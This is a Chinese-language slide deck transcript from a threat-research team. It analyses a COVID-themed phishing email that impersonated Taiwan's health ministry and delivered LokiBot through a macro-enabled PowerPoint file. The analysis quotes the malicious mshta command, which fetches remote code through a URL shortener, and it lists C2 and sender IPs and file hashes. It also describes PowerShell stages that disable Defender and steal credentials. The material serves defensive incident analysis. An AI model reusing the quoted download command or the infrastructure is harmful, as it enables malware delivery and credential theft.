Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
假冒衛福部部名義寄送含惡意程式之電子郵件樣本分析
Search
Sponsored
·
Your Podcast. Everywhere. Effortlessly.
Share. Educate. Inspire. Entertain. You do you. We'll handle the rest.
→
ISSDU Threat Research
June 15, 2020
Research
0
1.3k
假冒衛福部部名義寄送含惡意程式之電子郵件樣本分析
ISSDU Threat Research
June 15, 2020
Tweet
Share
More Decks by ISSDU Threat Research
See All by ISSDU Threat Research
ITHOME2020_CyberSec101.pdf
issdu
1
1.5k
Threat Hunting & Compromised Assessment on the cheap 101
issdu
0
180
Other Decks in Research
See All in Research
LiDARセキュリティ最前線(2025年)
kentaroy47
0
300
From Data Meshes to Data Spaces
posedio
PRO
0
460
言語モデルから言語について語る際に押さえておきたいこと
eumesy
PRO
5
1.7k
20年前に50代だった人たちの今
hysmrk
0
170
[SITA2025 Workshop] 空中計算による高速・低遅延な分散回帰分析
k_sato
0
130
「行ける・行けない表」による地域公共交通の性能評価
bansousha
0
130
学習型データ構造:機械学習を内包する新しいデータ構造の設計と解析
matsui_528
6
4.1k
Can We Teach Logical Reasoning to LLMs? – An Approach Using Synthetic Corpora (AAAI 2026 bridge keynote)
morishtr
1
170
はじまりの クエスチョンブック —余暇と豊かさにあふれた社会とは?
culturaltransition
PRO
0
140
湯村研究室の紹介2025 / yumulab2025
yumulab
0
320
生成的情報検索時代におけるAI利用と認知バイアス
trycycle
PRO
0
400
Self-Hosted WebAssembly Runtime for Runtime-Neutral Checkpoint/Restore in Edge–Cloud Continuum
chikuwait
0
410
Featured
See All Featured
How to Talk to Developers About Accessibility
jct
2
160
Speed Design
sergeychernyshev
33
1.6k
GraphQLとの向き合い方2022年版
quramy
50
14k
Raft: Consensus for Rubyists
vanstee
141
7.4k
Java REST API Framework Comparison - PWX 2021
mraible
34
9.2k
Bioeconomy Workshop: Dr. Julius Ecuru, Opportunities for a Bioeconomy in West Africa
akademiya2063
PRO
1
75
Impact Scores and Hybrid Strategies: The future of link building
tamaranovitovic
0
230
[RailsConf 2023] Rails as a piece of cake
palkan
59
6.4k
Redefining SEO in the New Era of Traffic Generation
szymonslowik
1
250
svc-hook: hooking system calls on ARM64 by binary rewriting
retrage
2
180
Done Done
chrislema
186
16k
Accessibility Awareness
sabderemane
0
84
Transcript
假冒衛福部部名義寄送含惡意 程式之電子郵件樣本分析 ISSDU Threat Research
Agenda • 樣本來源 • 樣本分析 • 樣本追蹤 • 結論與應處
樣本來源 ISSDU Threat Research
3 偽冒信件內容 • 研判該信件內容偽冒我國衛生福利部代理主任秘書”鄭舜平” • 信件署名為”台灣衛生部” ISSD U Threat R
esearch
4 寄件者追蹤 • 透過情資分享可發現到該信件寄件來源為”95.216.8.75”,為一芬蘭主 機商,研判為跳板主機 ISSD U Threat R esearch
5 樣本背景資訊 covid-19防护设备申请表.pot (VT: 27/62) • md5,D0ED831EE17E87FE82B1B203CF1C7405 • sha256,BA5C251F78A1D57B72901F4FF80824D6AD0AA4BF1931C5 93A36254DB4AB41021
Covid-19防护措施.ppt (VT: 27/62) • md5,D0ED831EE17E87FE82B1B203CF1C7405 • sha256,BA5C251F78A1D57B72901F4FF80824D6AD0AA4BF1931C5 93A36254DB4AB41021 ISSD U Threat R esearch
樣本分析 ISSDU Threat Research
7 行為分析(1) • 在VM中開啟PPT檔案,會詢問是否啟用巨集 ISSD U Threat R esearch
行為分析(2) • 從MDR後台可看到PPT執行後產生了”mshta.exe”以及來源為”檔案 瀏覽器(點擊開啟檔案)” ISSD U Threat R esearch
行為分析(3) • PPT產生的執行續”mshta”遭偵測為”Initial Access - Spearphishing Attachment – PowerPoint” ISSD
U Threat R esearch
行為分析(4) • 針對”mshta http://%20%
[email protected]
/asdakdxassddodkasodkaos”進 行檔案分析 • 該檔案使用WSCRIPT下載並執行多個”pastebin.com”上的內容 ISSD U Threat
R esearch
行為分析(5) • 第二段的”mshta”被偵測為”Command And Control - Command Interpreter Suspicious Download”
ISSD U Threat R esearch
行為分析(6) • 該檔案經解碼後發現其透過”POWERSHELL”下載並執 行”pastebin.com”上面的檔案 ISSD U Threat R esearch
行為分析(7) • 接續前頁POWERSHELL分析可發現到該POWERSHLL行為讓多個行為規 則告警 ISSD U Threat R esearch
行為分析(8) • POWERSHELL呼叫”InstallUtil”回報中繼站” 198.23.200.239” ISSD U Threat R esearch
行為分析(9) • 分析中繼站連線封包可發現到會回傳主機名稱等資訊 ISSD U Threat R esearch
樣本分析(1) • Sha256 • 95322ABC2EB990F100D99A83 1A2779D298B75D2410727FA8 42CA0A85BA4907DA(VT:53/72) • LOKIBOT第一段組件: •
關閉Windows Defender • 關閉Office安全性 ISSD U Threat R esearch
樣本分析(2) • Sha256(主要以竊取各種軟體帳號密碼為主要功能) • B88F644115A4B4CAAAFBED310FB6B8E2E6FDDA500CD5F495A229 A0A75E65FB9F(VT:64/73) ISSD U Threat R
esearch
樣本追蹤 ISSDU Threat Research
中繼站追蹤 • 透過該中繼站IP可發現到VIRUSTOTAL上九十天內已發現”155”個相關 樣本 ISSD U Threat R esearch
樣本追蹤關聯(1) • 該樣本已遭知名線上沙箱網站判定為”Lokibot”家族 ISSD U Threat R esearch
樣本追蹤關聯(2) • 該樣本使用多階段下載並載入相關內容,關聯圖如下: ISSD U Threat R esearch
樣本追蹤關聯(3) • 該樣本以ATT&CK技術涵蓋階段如下: ISSD U Threat R esearch
Lokibot為知名網路犯罪使用病毒 • https://any.run/malware-trends/lokibot ISSD U Threat R esearch
斯洛維尼亞CERT於近期也發布相關告警 • https://www.cert.si/si-cert-2020-05-lazno-sporocilo-nijz/ ISSD U Threat R esearch
結論與應處 ISSDU Threat Research
偽裝成衛福部官員信件 95.216.8.75 (寄件來源) 1 MSHTA mshta http://%20%20@j. mp/asdakdxassddo dkasodkaos 4
POWERSHELL 下載並植入 pastebin.com 內容 5 回報中繼站 198.23.200.239 竊取帳號密碼 關閉資安防護 6 附件檔案為PPT Covid-19防护措施.ppt 2 使用巨集載入後續內容 3 攻擊流程摘整 ISSD U Threat R esearch
結論 • COVID-19期間國際間已發現許多依該題材進行的社交工程郵件攻擊 • 由於我方收到的郵件題材署名為”台灣衛生部”,研判非針對性攻擊 • 國外CERT組織也發布行為類似的惡意軟體告警,研判為大量散播的釣魚 攻擊 ISSD U
Threat R esearch
應處 • 阻擋中繼站 • 198[.]23[.]200[.]239 • 樣本送樣 • 將我方提供之樣本提供給防毒軟體廠商進行送樣 •
COVID-19期間都需要針對該類型題材提高警覺 ISSD U Threat R esearch
Thank You
issdu
kentaroy47
posedio
eumesy
hysmrk
k_sato
bansousha
matsui_528
morishtr
culturaltransition
yumulab
trycycle
chikuwait
jct
sergeychernyshev
quramy
vanstee
mraible
akademiya2063
tamaranovitovic
palkan
szymonslowik
retrage
chrislema
sabderemane
![行為分析(4) • 針對”mshta http://%20%[email protected]/asdakdxassddodkasodkaos”進 行檔案分析 • 該檔案使用WSCRIPT下載並執行多個”pastebin.com”上的內容 ISSD U Threat](https://files.speakerdeck.com/presentations/de960472fadc437588f8b2d29544f0f4/slide_10.jpg){kind=link}
![應處 • 阻擋中繼站 • 198[.]23[.]200[.]239 • 樣本送樣 • 將我方提供之樣本提供給防毒軟體廠商進行送樣 •](https://files.speakerdeck.com/presentations/de960472fadc437588f8b2d29544f0f4/slide_28.jpg){kind=link}
